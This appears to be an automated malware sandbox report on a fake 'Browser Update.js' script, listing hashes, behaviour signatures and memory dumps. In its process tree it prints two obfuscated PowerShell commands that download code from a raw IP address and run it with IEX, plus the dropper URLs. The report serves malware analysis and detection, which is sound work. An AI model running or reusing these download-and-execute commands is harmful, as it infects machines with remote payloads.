Overview

overview

10

Static

static

1

Browser Update.js

windows7-x64

10

Browser Update.js

windows10-2004-x64

10

Analysis

  • max time kernel
    115s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    19-03-2024 20:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Browser Update.js

  • Size

    606KB

  • MD5

    80f7b21c47f037118ebdce07c9ad7791

  • SHA1

    ea386166ac8a027a7f245cbfa357320734bbcfcc

  • SHA256

    fbecd7506cbac2937c708ec38567949f550e9f0d4a0575b157dec69d9920cf57

  • SHA512

    b2003629653f0a4d3402b0b10654f0bfb838d56ca3168b2e5eb29bffe814554e80c9b969cc15d6ca4e4ff8dbd223e6696a9db0d7fd0c167df412fc76a3c9d469

  • SSDEEP

    1536:5+BEG+BEVB/+BEVB/+BEVB2BEhBEZBEhBEZBEhBEZBEhBENBEFEMBEFEMBEFEMB4:n

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://193.233.132.136/a/z.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://193.233.132.136/a/s.png

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Browser Update.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://193.233.132.136/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://193.233.132.136/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:772

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    8009c62f8f9fb51677b950c4509fab6c

    SHA1

    cdbbea1485ae74c36eda08d9907ea887e9d65491

    SHA256

    9b161eb0daa9d21b33556ec1c661d75f8077c03d116951df2665fdce43fbc1d6

    SHA512

    c6b10ffac2415fa71585e0d1dc87a5eaeba9e94a17ff355cebf9c310780d390e289c8858aaaeeaf2dcf763513464180519c9f168f2a2b193ff3d7f1151db83fd

    Download Submit
  • memory/772-11-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/772-33-0x0000000002950000-0x0000000002962000-memory.dmp
    Filesize

    72KB

    Download
  • memory/772-23-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/772-12-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/772-32-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/772-35-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/772-30-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/772-29-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/772-17-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/772-27-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/772-24-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/772-20-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/2720-14-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/2720-19-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/2720-25-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/2720-26-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/2720-18-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/2720-28-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/2720-16-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/2720-15-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/2720-31-0x00000000029A0000-0x0000000002A20000-memory.dmp
    Filesize

    512KB

    Download
  • memory/2720-13-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/2720-34-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp
    Filesize

    9.6MB

    Download
  • memory/2720-9-0x000000001B490000-0x000000001B772000-memory.dmp
    Filesize

    2.9MB

    Download
  • memory/2720-10-0x0000000002460000-0x0000000002468000-memory.dmp
    Filesize

    32KB

    Download